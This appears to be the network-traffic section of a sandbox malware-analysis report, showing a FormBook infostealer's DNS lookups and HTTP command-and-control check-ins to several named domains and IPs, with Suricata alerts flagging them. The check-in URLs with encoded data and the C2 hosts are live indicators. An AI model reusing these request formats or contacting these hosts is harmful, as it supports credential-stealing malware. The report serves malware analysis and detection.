Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.sunspotplumbing.com |
CNAME
sunspotplumbing.com
|
15.197.148.33 |
| www.dryadai.com | 3.64.163.50 | |
| www.sarthaksrishticreation.com | 119.18.49.69 | |
| www.fuhouse.link |
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.101:137
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:50800
-
GET
301
http://www.sarthaksrishticreation.com/sy22/?tZUT=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&9r48E=FdC4E0Y
REQUEST
RESPONSE
BODY
GET /sy22/?tZUT=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&9r48E=FdC4E0Y HTTP/1.1
Host: www.sarthaksrishticreation.com
Connection: close
HTTP/1.1 301 Moved Permanently
Date: Thu, 26 Oct 2023 08:14:48 GMT
Server: Apache
Location: https://www.sarthaksrishticreation.com/sy22/?tZUT=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&9r48E=FdC4E0Y
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET
0
http://www.sunspotplumbing.com/sy22/?tZUT=d6AqkGJ7bunbgmizHHRyxSnS+cE7N+DoqWC4nPxnpUsdFYm3pr534s62tX1C6jkDEl4YnzCY&9r48E=FdC4E0Y
REQUEST
RESPONSE
BODY
GET /sy22/?tZUT=d6AqkGJ7bunbgmizHHRyxSnS+cE7N+DoqWC4nPxnpUsdFYm3pr534s62tX1C6jkDEl4YnzCY&9r48E=FdC4E0Y HTTP/1.1
Host: www.sunspotplumbing.com
Connection: close
GET
410
http://www.dryadai.com/sy22/?tZUT=T4nku/U6fUoiT4V699ActYtDMjyavvK02m+fxEC1q0+DSMs1WUMajGSqA4Kum2DGC179VQvP&9r48E=FdC4E0Y
REQUEST
RESPONSE
BODY
GET /sy22/?tZUT=T4nku/U6fUoiT4V699ActYtDMjyavvK02m+fxEC1q0+DSMs1WUMajGSqA4Kum2DGC179VQvP&9r48E=FdC4E0Y HTTP/1.1
Host: www.dryadai.com
Connection: close
HTTP/1.1 410 Gone
Server: openresty
Date: Thu, 26 Oct 2023 08:15:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49166 -> 119.18.49.69:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49167 -> 3.33.130.190:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49168 -> 3.64.163.50:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts